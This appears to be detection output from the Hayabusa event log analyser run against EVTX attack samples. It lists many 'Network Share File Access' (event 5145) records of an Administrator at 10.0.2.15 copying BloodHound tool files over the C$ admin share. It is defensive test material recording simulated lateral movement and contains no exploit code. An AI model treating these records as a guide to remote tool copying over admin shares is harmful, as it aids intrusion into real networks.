10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.noverlap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.cypher : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.gexf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.pathfinding.astar : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.activeState : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.animate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.colorbrewer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.design : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.dragNodes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.edgeSiblings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.filter : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.fullScreen : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.generators : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.keyboard : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.lasso : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.leaflet : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.legend : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.locate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.neighborhoods : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.poweredBy : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.relativeSize : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.select : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.tooltips : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.customEdgeShapes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.edgeLabels : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.glyphs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.halo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.linkurious : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.HITS : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.louvain : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\scripts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\captors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\classes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\middlewares : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\misc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\renderers : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\locate-path : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.968 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash\fp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.978 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\loose-envify : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\make-dir : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : 
Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\md5-file : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimatch : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\test : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\dojo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : 
